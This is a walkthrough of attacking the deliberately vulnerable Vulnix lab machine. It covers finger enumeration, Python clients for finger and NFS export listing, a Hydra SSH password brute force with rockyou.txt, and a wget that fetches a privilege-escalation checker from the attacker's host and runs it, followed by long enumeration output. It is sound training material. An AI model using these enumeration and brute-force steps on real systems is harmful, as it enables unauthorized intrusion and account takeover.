[gandosha@GandoPC 192.168.43.4]$ finger -l games@192.168.43.4
[192.168.43.4]
Login: games                            Name: games
Directory: /usr/games                   Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l gnats@192.168.43.4
[192.168.43.4]
Login: gnats                            Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats               Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l irc@192.168.43.4
[192.168.43.4]
Login: irc                              Name: ircd
Directory: /var/run/ircd                Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l list@192.168.43.4
[192.168.43.4]
Login: list                             Name: Mailing List Manager
Directory: /var/list                    Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l libuuid@192.168.43.4
[192.168.43.4]
Login: libuuid                          Name: 
Directory: /var/lib/libuuid             Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l lp@192.168.43.4
[192.168.43.4]
Login: lp                               Name: lp
Directory: /var/spool/lpd               Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l mail@192.168.43.4
[192.168.43.4]
Login: mail                             Name: mail
Directory: /var/mail                    Shell: /bin/sh
Never logged in.
No mail.
No Plan.

Login: dovecot                          Name: Dovecot mail server
Directory: /usr/lib/dovecot             Shell: /bin/false
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l man@192.168.43.4
[192.168.43.4]
Login: man                              Name: man
Directory: /var/cache/man               Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l messagebus@192.168.43.4
[192.168.43.4]
Login: messagebus                       Name: 
Directory: /var/run/dbus                Shell: /bin/false
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l news@192.168.43.4
[192.168.43.4]
Login: news                             Name: news
Directory: /var/spool/news              Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l nobody@192.168.43.4
[192.168.43.4]
Login: nobody                           Name: nobody
Directory: /nonexistent                 Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l postmaster@192.168.43.4
[192.168.43.4]
finger: postmaster: no such user.

[gandosha@GandoPC 192.168.43.4]$ finger -l proxy@192.168.43.4
[192.168.43.4]
Login: proxy                            Name: proxy
Directory: /bin                         Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l sshd@192.168.43.4
[192.168.43.4]
Login: sshd                             Name: 
Directory: /var/run/sshd                Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l sync@192.168.43.4
[192.168.43.4]
Login: sync                             Name: sync
Directory: /bin                         Shell: /bin/sync
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l sys@192.168.43.4
[192.168.43.4]
Login: sys                              Name: sys
Directory: /dev                         Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l syslog@192.168.43.4
[192.168.43.4]
Login: syslog                           Name: 
Directory: /home/syslog                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l user@192.168.43.4
[192.168.43.4]
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l uucp@192.168.43.4
[192.168.43.4]
Login: uucp                             Name: uucp
Directory: /var/spool/uucp              Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l www-data@192.168.43.4
[192.168.43.4]
Login: www-data                         Name: www-data
Directory: /var/www                     Shell: /bin/sh
Never logged in.
No mail.
No Plan.
The "user" account stands out: it has a real home directory under /home and a /bin/bash login shell, while every other account is a system user with /bin/sh, /bin/false or nologin, so it is the one worth a password-guessing attempt. Two extra entries appeared along the way because finger also matches the full-name field: the query for mail returned dovecot ("Dovecot mail server") and the query for user returned dovenull ("Dovecot login user"); both have /bin/false and are not usable logins. postmaster, reported by VRFY, is not a Unix account at all.
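Added example, not from the original write-up: a finger client (RFC 1288, sending the same /W request that finger -l sends) plus a parser that turns each long-format reply into fields and applies the triage used above: a home under /home (or /root) and a shell that actually logs in. The sample replies are constructed from the output above, with the tabs fingerd emits, so the script runs offline; finger_query is the live path, and the parser assumes one account entry per reply.

```python
import re
import socket

# Constructed sample replies, copied from the finger output above (tabs as fingerd sends them),
# plus the "no such user" case, so the parser and triage run offline.
SAMPLE_REPLIES = {
    "user": ("Login: user           \t\t\tName: user\n"
             "Directory: /home/user               \tShell: /bin/bash\n"
             "Never logged in.\nNo mail.\nNo Plan.\n"),
    "sshd": ("Login: sshd           \t\t\tName: \n"
             "Directory: /var/run/sshd            \tShell: /usr/sbin/nologin\n"
             "Never logged in.\nNo mail.\nNo Plan.\n"),
    "syslog": ("Login: syslog         \t\t\tName: \n"
               "Directory: /home/syslog             \tShell: /bin/false\n"
               "Never logged in.\nNo mail.\nNo Plan.\n"),
    "postmaster": "finger: postmaster: no such user.\n",
}

# Long-format replies carry two fields per line; the lookahead ends a value at the next field or line end.
FIELD_RE = re.compile(r"(Login|Name|Directory|Shell):\s*(.*?)\s*(?=(?:Login|Name|Directory|Shell):|\r?\n|$)")

# Shells that never give an interactive session, whatever the password.
NON_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

def finger_query(host: str, user: str, timeout: float = 5.0) -> str:
    """Finger protocol (RFC 1288): send '/W user' on TCP/79 and read until the server closes.
    '/W' requests the long format, which is what 'finger -l' sends."""
    with socket.create_connection((host, 79), timeout=timeout) as sock:
        sock.sendall(f"/W {user}\r\n".encode())
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode(errors="replace")

def parse_finger_reply(text: str):
    """Turn one long-format reply into {'Login', 'Name', 'Directory', 'Shell', 'never_logged_in'};
    returns None when the server answered 'no such user'."""
    if "no such user" in text:
        return None
    info = dict(FIELD_RE.findall(text))
    info["never_logged_in"] = "Never logged in." in text
    return info

def is_candidate(info: dict) -> bool:
    """An account worth a password-guessing attempt: a home under /home (or /root)
    and a shell that actually logs in. This is the reasoning applied to 'user' above."""
    home = info.get("Directory", "")
    real_home = home.startswith("/home/") or home == "/root"
    return real_home and info.get("Shell") not in NON_LOGIN_SHELLS

def triage(replies: dict) -> dict:
    """Map each queried name to 'candidate', 'system account' or 'no such user'."""
    verdicts = {}
    for name, text in replies.items():
        info = parse_finger_reply(text)
        if info is None:
            verdicts[name] = "no such user"
        else:
            verdicts[name] = "candidate" if is_candidate(info) else "system account"
    return verdicts

if __name__ == "__main__":
    # Offline run over the constructed samples. Against a live host, build the input with
    # {u: finger_query("192.168.43.4", u) for u in names} instead.
    for name, verdict in triage(SAMPLE_REPLIES).items():
        print(f"{name:12s} {verdict}")
```

The shell check matters as much as the home directory: syslog also lives under /home, but /bin/false means a correct password would still not give a session, so it is filtered out rather than wasting brute-force time on it.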
Port 111 check:
Port 111 is rpcbind, the portmapper. Its rpcinfo listing in the Nmap output registers the nfs program (100003) on 2049/tcp and mountd (100005) on a high port, so the host is an NFS server and may be exporting directories.
I used showmount to dig into those shares:
[gandosha@GandoPC 192.168.43.4]$ showmount -e 192.168.43.4
Export list for 192.168.43.4:
/home/vulnix *
An interesting share is discovered: /home/vulnix is exported to everyone (the * means no client restriction), so any host on the network may mount it. Whether that is useful depends on the export options: with the default root_squash, the client's root is mapped to the anonymous user, so a directory readable only by its owner stays closed even to root on the client.
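What showmount -e does on the wire, as an added example that is not part of the original write-up or of nfs-utils: an RPC GETPORT call to rpcbind on 111/tcp to locate mountd (program 100005, which the rpcinfo listing above places on 41645/tcp), then a MOUNTPROC3_EXPORT call against mountd, with the XDR export list decoded into (directory, allowed clients) pairs. build_export_reply constructs a reply in that wire format so the decoding can be run offline; single-fragment TCP replies and AUTH_NULL credentials are assumed.

```python
import os
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAP_GETPORT = 100000, 2, 3     # rpcbind (portmapper) on TCP/111
MOUNT_PROG, MOUNT_VERS, MOUNT_EXPORT = 100005, 3, 5   # mountd, MOUNTPROC3_EXPORT
IPPROTO_TCP = 6

def xdr_string(data: bytes) -> bytes:
    """XDR string: 4-byte big-endian length, the bytes, zero padding to a 4-byte boundary."""
    return struct.pack(">I", len(data)) + data + b"\x00" * ((-len(data)) % 4)

def rpc_call(prog: int, vers: int, proc: int, args: bytes, xid: int) -> bytes:
    """ONC RPC v2 CALL message (RFC 5531) with AUTH_NULL credential and verifier."""
    header = struct.pack(">IIIIII", xid, 0, 2, prog, vers, proc)  # msg_type 0 = CALL, rpcvers = 2
    auth_null = struct.pack(">II", 0, 0)                           # flavor AUTH_NULL, zero-length body
    return header + auth_null + auth_null + args                   # cred, verf, procedure arguments

def tcp_record(payload: bytes) -> bytes:
    """RPC-over-TCP record marking: high bit = last fragment, low 31 bits = fragment length."""
    return struct.pack(">I", 0x80000000 | len(payload)) + payload

class Xdr:
    """Minimal XDR reader over a bytes buffer."""
    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0
    def u32(self) -> int:
        (value,) = struct.unpack_from(">I", self.buf, self.pos)
        self.pos += 4
        return value
    def string(self) -> str:
        n = self.u32()
        value = self.buf[self.pos:self.pos + n]
        self.pos += n + ((-n) % 4)
        return value.decode(errors="replace")

def rpc_reply_body(reply: bytes, xid: int) -> Xdr:
    """Check the reply header (xid, REPLY, MSG_ACCEPTED, SUCCESS); return a reader at the result."""
    x = Xdr(reply)
    if x.u32() != xid or x.u32() != 1:            # msg_type 1 = REPLY
        raise ValueError("not a reply to our call")
    if x.u32() != 0:                              # reply_stat 0 = MSG_ACCEPTED
        raise ValueError("RPC call denied")
    x.u32()                                       # verifier flavor
    verf_len = x.u32()                            # verifier body is opaque: skip it
    x.pos += verf_len + ((-verf_len) % 4)
    if x.u32() != 0:                              # accept_stat 0 = SUCCESS
        raise ValueError("program, version or procedure unavailable")
    return x

def parse_exports(x: Xdr):
    """MOUNTPROC3_EXPORT result: a linked list of (directory, [allowed clients])."""
    exports = []
    while x.u32() == 1:                           # exportnode "value follows"
        path, groups = x.string(), []
        while x.u32() == 1:                       # groupnode "value follows"
            groups.append(x.string())
        exports.append((path, groups))
    return exports

def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("short read from RPC server")
        buf += chunk
    return buf

def rpc_tcp(host: str, port: int, prog: int, vers: int, proc: int, args: bytes = b"") -> Xdr:
    """One RPC call over TCP; the reply is assumed to arrive as a single fragment."""
    xid = int.from_bytes(os.urandom(4), "big")
    with socket.create_connection((host, port), timeout=5.0) as sock:
        sock.sendall(tcp_record(rpc_call(prog, vers, proc, args, xid)))
        (mark,) = struct.unpack(">I", recv_exact(sock, 4))
        return rpc_reply_body(recv_exact(sock, mark & 0x7FFFFFFF), xid)

def showmount_exports(host: str):
    """What 'showmount -e' does: ask rpcbind where mountd listens, then ask mountd for its exports."""
    getport_args = struct.pack(">IIII", MOUNT_PROG,	MOUNT_VERS, IPPROTO_TCP, 0)
    mountd_port = rpc_tcp(host, 111, PMAP_PROG, PMAP_VERS, PMAP_GETPORT, getport_args).u32()
    if mountd_port == 0:
        raise RuntimeError("mountd is not registered with rpcbind")
    return parse_exports(rpc_tcp(host, mountd_port, MOUNT_PROG, MOUNT_VERS, MOUNT_EXPORT))

def build_export_reply(xid: int, exports) -> bytes:
    """Constructed reply in mountd's wire format, so the parser can be exercised offline."""
    body = struct.pack(">IIIIII", xid, 1, 0, 0, 0, 0)   # REPLY, MSG_ACCEPTED, AUTH_NULL verifier, SUCCESS
    for path, groups in exports:
        body += struct.pack(">I", 1) + xdr_string(path.encode())
        for group in groups:
            body += struct.pack(">I", 1) + xdr_string(group.encode())
        body += struct.pack(">I", 0)
    return body + struct.pack(">I", 0)

if __name__ == "__main__":
    # Offline: decode a constructed reply carrying the export seen on Vulnix.
    print(parse_exports(rpc_reply_body(build_export_reply(7, [("/home/vulnix", ["*"])]), 7)))
    # Live, against the lab host: print(showmount_exports("192.168.43.4"))
```

The point of seeing the two-step lookup is that the export list itself is served with no authentication at all: AUTH_NULL is enough for EXPORT, and an empty group list or a lone "*" in the reply is the same "anyone may mount this" that showmount prints.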
Finger output did not help me a lot:
[gandosha@GandoPC mnt]$ finger -l vulnix@192.168.43.4
[192.168.43.4]
Login: vulnix                           Name: 
Directory: /home/vulnix                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.
I mounted this share on my local host to see what's in there:
[GandoPC ~]# mkdir -p /mnt/home/vulnix
[GandoPC ~]# mount 192.168.43.4:/home/vulnix /mnt/home/vulnix
[GandoPC ~]# cd /mnt/home/vulnix
bash: cd: /mnt/home/vulnix: Permission denied
Root squashing is enabled, so I can't access it.
I had no choice except brute-forcing the SSH service with the "user" and "vulnix" accounts.
Gaining SSH access with "user" user:
Brute force attack on "user":
[gandosha@GandoPC 192.168.43.4]$ sudo hydra -l user -P /home/gandosha/Desktop/SecLists/Passwords/Leaked-Databases/rockyou.txt 192.168.43.4 ssh -t 4
[sudo] password for gandosha: 
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-16 19:17:37
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://192.168.43.4:22/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344334 to do in 3735:31h, 4 active
[STATUS] 61.33 tries/min, 184 tries in 00:03h, 14344214 to do in 3897:54h, 4 active
[STATUS] 60.29 tries/min, 422 tries in 00:07h, 14343976 to do in 3965:34h, 4 active
[22][ssh] host: 192.168.43.4   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-16 19:26:15
I connected as "user" via SSH and started to enumerate its permissions with linuxprivchecker.py:
[gandosha@GandoPC 192.168.43.4]$ ssh user@192.168.43.4
user@192.168.43.4's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Oct 16 17:04:35 BST 2018
System load: 0.03 Processes: 87
Usage of /: 94.3% of 773MB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.43.4
Swap usage: 0%
=> / is using 94.3% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Tue Oct 16 16:45:42 2018 from 192.168.43.3
user@vulnix:~$ cd /tmp;ls
user@vulnix:/tmp$ wget 192.168.43.3//Tools/linuxprivchecker/linuxprivchecker.py
--2018-10-16 17:05:34-- http://192.168.43.3//Tools/linuxprivchecker/linuxprivchecker.py
Connecting to 192.168.43.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K)
Saving to: `linuxprivchecker.py'
100%[====================================================================================================================================================>] 25,304 --.-K/s in 0s
2018-10-16 17:05:34 (703 MB/s) - `linuxprivchecker.py' saved [25304/25304]
user@vulnix:/tmp$ chmod +x linuxprivchecker.py
user@vulnix:/tmp$ python ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.2.0-29-generic-pae (buildd@roseapple) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012
[+] Hostname
vulnix
[+] Operating System
Ubuntu 12.04.1 LTS \n \l
db db db db db d8b db d888888b db db
88 88 88 88 88 888o 88 `88' `8b d8'
Y8 8P 88 88 88 88V8o 88 88 `8bd8'
`8b d8' 88 88 88 88 V8o88 88 .dPYb.
`8bd8' 88b d88 88booo. 88 V888 .88. .8P Y8.
YP ~Y8888P' Y88888P VP V8P Y888888P YP YP
Release 1.0
This is a deliberately vulnerable image. Do not place within a live environment.
For training purposes only.
www.rebootuser.com
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 08:00:27:af:e3:88
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feaf:e388/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2861221 errors:0 dropped:0 overruns:0 frame:0
TX packets:2446285 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:346478250 (346.4 MB) TX bytes:419583453 (419.5 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:636 errors:0 dropped:0 overruns:0 frame:0
TX packets:636 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:53300 (53.3 KB) TX bytes:53300 (53.3 KB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:41645 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:60141 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36654 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:43602 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:60680 0.0.0.0:* LISTEN -
tcp 0 0 192.168.43.4:758 192.168.43.3:41635 ESTABLISHED -
tcp 0 0 192.168.43.4:2049 192.168.43.3:835 ESTABLISHED -
tcp 0 0 192.168.43.4:22 192.168.43.3:50034 ESTABLISHED -
tcp6 0 0 :::60109 :::* LISTEN -
tcp6 0 0 :::110 :::* LISTEN -
tcp6 0 0 :::143 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::60309 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::54231 :::* LISTEN -
tcp6 0 0 :::59223 :::* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
tcp6 0 0 :::2049 :::* LISTEN -
tcp6 0 0 :::993 :::* LISTEN -
tcp6 0 0 :::995 :::* LISTEN -
tcp6 0 0 :::52518 :::* LISTEN -
udp 0 0 0.0.0.0:54966 0.0.0.0:* -
udp 0 0 127.0.0.1:985 0.0.0.0:* -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 0.0.0.0:46599 0.0.0.0:* -
udp 0 0 0.0.0.0:800 0.0.0.0:* -
udp 0 0 0.0.0.0:50218 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:51815 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:47493 0.0.0.0:* -
udp6 0 0 :::40843 :::* -
udp6 0 0 :::34491 :::* -
udp6 0 0 :::2049 :::* -
udp6 0 0 :::800 :::* -
udp6 0 0 :::38998 :::* -
udp6 0 0 :::53083 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::50036 :::* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.43.0 * 255.255.255.0 U 0 0 0 eth0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
/dev/mapper/vulnix-root on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
/dev/sda1 on /boot type ext2 (rw)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw)
nfsd on /proc/fs/nfsd type nfsd (rw)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#
proc /proc proc nodev,noexec,nosuid 0 0
/dev/mapper/vulnix-root / ext4 errors=remount-ro 0 1
# /boot was on /dev/sda1 during installation
UUID=14f8e0aa-04a1-4976-a52b-73ab33ba1f1f /boot ext2 defaults 0 2
/dev/mapper/vulnix-swap_1 none swap sw 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rwxr-xr-x 1 root root 219 Apr 10 2012 apport
-rwxr-xr-x 1 root root 15399 Jun 15 2012 apt
-rwxr-xr-x 1 root root 314 Mar 30 2012 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 Apr 13 2012 dpkg
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Mar 31 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Apr 9 2012 passwd
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
-rwxr-xr-x 1 root root 214 Aug 9 2012 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Sep 2 2012 .
drwxr-xr-x 91 root root 4096 Oct 16 11:51 ..
-rwxr-xr-x 1 root root 730 Dec 31 2011 apt-xapian-index
-rwxr-xr-x 1 root root 907 Mar 31 2012 man-db
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
17:05:51 up 5:14, 1 user, load average: 0.01, 0.12, 2.43
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user pts/0 192.168.43.3 17:04 0.00s 0.22s 0.00s w
[+] Super Users Found:
root
[+] Environment
LESSOPEN=| /usr/bin/lesspipe %s
MAIL=/var/mail/user
SSH_CLIENT=192.168.43.3 50034 22
USER=user
LANGUAGE=en_GB:en
SHLVL=1
HOME=/home/user
OLDPWD=/home/user
SSH_TTY=/dev/pts/0
LOGNAME=user
_=/usr/bin/python
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
LANG=en_GB.UTF-8
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/tmp
SSH_CONNECTION=192.168.43.3 50034 192.168.43.4 22
[+] Root and current user history (depends on privs)
-rw------- 1 user user 5 Oct 16 17:04 /home/user/.bash_history
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
[+] Current User
user
[+] Current User ID
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Oct 16 11:51 /run/shm
drwxrwxrwt 4 root root 80 Oct 16 11:51 /run/lock
drwxrwxrwt 2 root root 4096 Aug 4 2012 /var/tmp
drwxrwsrwt 2 root whoopsie 4096 Sep 2 2012 /var/crash
drwxrwxrwt 2 root root 4096 Oct 16 17:05 /tmp
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
drwxr-s--- 2 root dip 4096 Sep 2 2012 /etc/chatscripts
drwxr-s--- 2 root dip 4096 Sep 2 2012 /etc/ppp/peers
-rwxr-sr-x 1 root shadow 30364 Feb 9 2012 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 96904 Apr 9 2012 /sbin/mount.nfs
drwxrwsr-x 2 root staff 4096 Aug 4 2012 /var/local
drwxr-sr-x 33 man root 4096 Sep 2 2012 /var/cache/man
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ja/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ja/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ja/cat5
drwxr-sr-x 3 man root 4096 Sep 2 2012 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/gl/cat8
drwxr-sr-x 6 man root 4096 Sep 2 2012 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat7
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cs/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat1
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fi/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fi/cat8
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/hu/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/hu/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/hu/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat8
